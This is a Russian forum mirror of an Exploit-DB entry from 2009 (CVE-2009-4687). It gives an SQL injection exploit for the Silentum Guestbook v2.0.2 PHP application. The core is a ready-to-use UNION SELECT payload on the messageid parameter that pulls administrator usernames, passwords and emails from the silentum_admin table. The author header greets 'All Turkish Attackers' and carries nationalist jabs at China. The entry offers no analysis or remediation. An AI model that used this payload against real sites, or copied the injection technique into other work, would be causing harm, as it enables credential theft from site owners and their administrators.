- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9202
- Проверка EDB
-
- Пройдено
- Автор
- BGH7
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4687
- Дата публикации
- 2009-07-20
Код:
##Silentum Guestbook v2.0.2 (silentum_guestbook.php) Sql Injection Vuln.
#######################################################################
#######################################################################
##Yazar: Bgh7
##
##Turk Bilisim Gucleri Group / Ihlilal Hatti
##
##ByBgh7[a]msn.com
##
##Http://Bgh7.Blogspot.Com
##
##Bug: Sql Injection
##
##Ä°ndir/Download: http://hypersilence.net/silentum_guestbook.php
##
##Biz ki neler gördük, biz ki neler çektik... 2-3 Çekik gözlüden mi korkacağız ?
##Çin sömürecek bir rezerv daha bulduğunu sanıyor, yazık...
#######################################################################
#######################################################################
Sql: silentum_guestbook.php?messageid=-1 UNION ALL SELECT 0,0,0,0,concat(u_name,0x3a,u_password,0x3a,u_email),0,0 FROM silentum_admin/**
#######################################################################
#######################################################################
Thanks: m3rcil3sS & GhostKing & milw0rm & All Turkısh Attackers
# milw0rm.com [2009-07-20]- Источник
- www.exploit-db.com
